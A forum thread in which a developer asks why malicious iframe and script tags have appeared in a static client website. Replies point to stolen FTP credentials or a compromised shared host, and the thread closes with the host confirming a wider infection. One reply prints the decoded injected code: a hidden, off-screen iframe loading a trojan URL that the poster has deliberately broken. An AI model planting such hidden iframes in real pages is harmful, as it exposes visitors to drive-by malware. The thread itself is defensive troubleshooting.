Tek-Tips is the largest IT community on the Internet today!

Members share and learn making Tek-Tips Forums the best source of peer-reviewed technical information on the Internet!

Register Log in
  • Congratulations strongm on being selected by the Tek-Tips community for having the most helpful posts in the forums last week. Way to Go!

Code Injection Problem 4

Status
Not open for further replies.
vicvirk

vicvirk

Programmer
Feb 4, 2009
636
CA
Hey Everyone,

I posted this in the Javascript forum, someone suggested I try here, view the full current discussion at:


------------------------

I have a website with JS as the only scripting language used - all the wepages have HTML extensions. The server is a LAMP setup, but I am not using any PHP or MYSQL on the site, again all pages are static with NO CMS and no forms.

The website itself does not contain any scripting pages (i.e. .php) within the directory structure. All I am using is:

1. .HTML pages
2. .CSS for stylesheets
3. .JS for javascript functions (there are about 3-4 in total)
4. Google Analytics

I am now having a problem with CODE INJECTION where some of the pages contain that dreaded iframe tag with script tags pointing to trojan files.

I don't want to post a link to the site just in case someone who doesn't have virus protection goes to it.

At this point, I cannot turn off the site, but will be able to do so later this afternoon (I'm in the Pacific time zone - North America)

So my questions are:

1. Can someone (or thing) inject code using javascript - if yes, how do I prevent it (a link to a reference will do if it's a lot of information...I can't seem to find one)

2. What other ways (if not JS) could the code injection be happening (if no through JS)?

3. Is there a forum on this site dedicated to these type of issues???

Thanks everyone..

--------
GOOGLE is a great resource to find answers to questions like "how do i..."

If you don't know exaclty what you want to do or what to search on, try Google Suggest: --------
I have recently been semi-converted to ensuring all my code (well most of it) works in both javascript and non-javasc
 
Sort by date Sort by votes
No scripting pages, no cms?

My first guess would be: you caught a trojan on your computer which has grabbed your ftp info; the hacker then logged into your webmaster FTP account and injected the code thusly.

Do a thorough malware/spyware scan.

Cheers,
MiS

[navy]"We had to turn off that service to comply with the CDA Bill."[/navy]
- The Bastard Operator From Hell
 
Upvote 0 Downvote
I see you have already been advised about a possible infection in the other thread.
Have you checked that?

[navy]"We had to turn off that service to comply with the CDA Bill."[/navy]
- The Bastard Operator From Hell
 
Upvote 0 Downvote
I would concur. I doubt it is coming over the Web from the pages. The door in is from your machine or the server. The server itself could very well be comprimised.

 
Upvote 0 Downvote
I do have virus protection on my dev machine and it's scanned everyday - I'll do a full scan tonight and advise my clients to do the same.

This is the only client that has been infected, so I am assuming it's either on their machine or it's their server.

MakeItSo - you are correct, NO CMS and no Server Side scripting. The only external call that is made is to google analytics, other than that, everything is local to the domain.

I'll do my scan tonight and post the results - thanks for your help everyone...

--------
GOOGLE is a great resource to find answers to questions like "how do i..."

If you don't know exaclty what you want to do or what to search on, try Google Suggest: --------
I have recently been semi-converted to ensuring all my code (well most of it) works in both javascript and non-javasc
 
Upvote 0 Downvote

In particular, check the last link. All in all, I agree that it it sounds more like client-side FTP than something on the server, since it only affects one site. Can you copy and paste the iframe/JavaScript to the iframe? Maybe we can figure out what it is.

----------------------------
"Will work for bandwidth" - Thinkgeek T-shirt
 
Upvote 0 Downvote
TechieMicheal,

It's an isolated client, all of my clients are. I develop on my machine and then FTP the files to wherever they need me to - sometimes it's as simple as a public FTP site and they take care of the publishing, other times it's directly to their production server after they've seen a preview of it on my development server (i've even copied sites to cd and sent them by courier).

I do have other client FTP information on my computer, but none of those sites have been infected - so that leads me to believe that my computer is locked down pretty good - but I'll still do a full scan tonight when I get home (it's still morning where I am and I'm at my reg full time job at the moment)

here is a link to the source as read by W3C's validator - the extra script is causing the validation errors...you'll notice the code just before the closing </head> tag - the source is provided at the bottom of the page:


Thanks

--------
GOOGLE is a great resource to find answers to questions like "how do i..."

If you don't know exaclty what you want to do or what to search on, try Google Suggest: --------
I have recently been semi-converted to ensuring all my code (well most of it) works in both javascript and non-javasc
 
Upvote 0 Downvote
It might be a good idea to take the site down ... Google has already picked it up as a malware site.

I took the liberty of decoding the JavaScript for you.

Code: 
<iframe width="480" height="60" src="hxxp://tr aff ics-inspector.cn/daily_ stats/i n.cg i?3" style="border:0px; position:relative; top:0px; left:-500px; opacity:0; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0); -moz-opacity:0"></iframe>

I have intentionally broken the URI, but you get the idea. Is this a shared webserver that they are hosted on? Have you contacted the webhost to see if other sites have been compromised?

Either way, I highly recommend you take the site down until you can figure out what's going on.

----------------------------
"Will work for bandwidth" - Thinkgeek T-shirt
 
Upvote 0 Downvote
CERT has issued an warning on Gumblar which may be related to your problem. You can read about it at SearchSecurity.com.



James P. Cottingham
[sup]I'm number 1,229!
I'm number 1,229![/sup]
 
Upvote 0 Downvote
Looks like it was an issue with the hosting company - I got in touch with someone there and they said that a lot of other sites on the same box were infected with the exact same thing. The source is unknown at this time.

I'll be "fixing" it tonight, and have suggested to my clients that the site be moved to another host as soon as possible - they agree.

Thanks everyone for your help...

--------
GOOGLE is a great resource to find answers to questions like "how do i..."

If you don't know exaclty what you want to do or what to search on, try Google Suggest: --------
I have recently been semi-converted to ensuring all my code (well most of it) works in both javascript and non-javasc
 
Upvote 0 Downvote
Glad you got it worked out. You'll probably have to contact Google (or perhaps it'd be better coming from your host since your site wasn't the only one affected) to get them to remove the suspicious listing.

----------------------------
"Will work for bandwidth" - Thinkgeek T-shirt
 
Upvote 0 Downvote
Status
Not open for further replies.

Similar threads

ITSUPPORTIT
  • Locked
  • Question
VPN from ASA 5510 and RV215W problem
Replies
0
Views
77
ITSUPPORTIT
ITSUPPORTIT
wrighbr1
  • Locked
  • Question
Cisco ASA 5505 site to site VPN problem
Replies
0
Views
58
wrighbr1
wrighbr1
mattbarkerlfc
  • Locked
  • Question
Checkpoint 2200 subnet overlap problem
Replies
0
Views
74
mattbarkerlfc
mattbarkerlfc
sebd44
  • Locked
  • Question
sonicwall statistics problem
Replies
0
Views
56
sebd44
sebd44
kjurczok
  • Locked
  • Question
ASA 5515 9.2 port forwarding problem
Replies
0
Views
93
kjurczok
kjurczok

Part and Inventory Search

Sponsor

Back
Top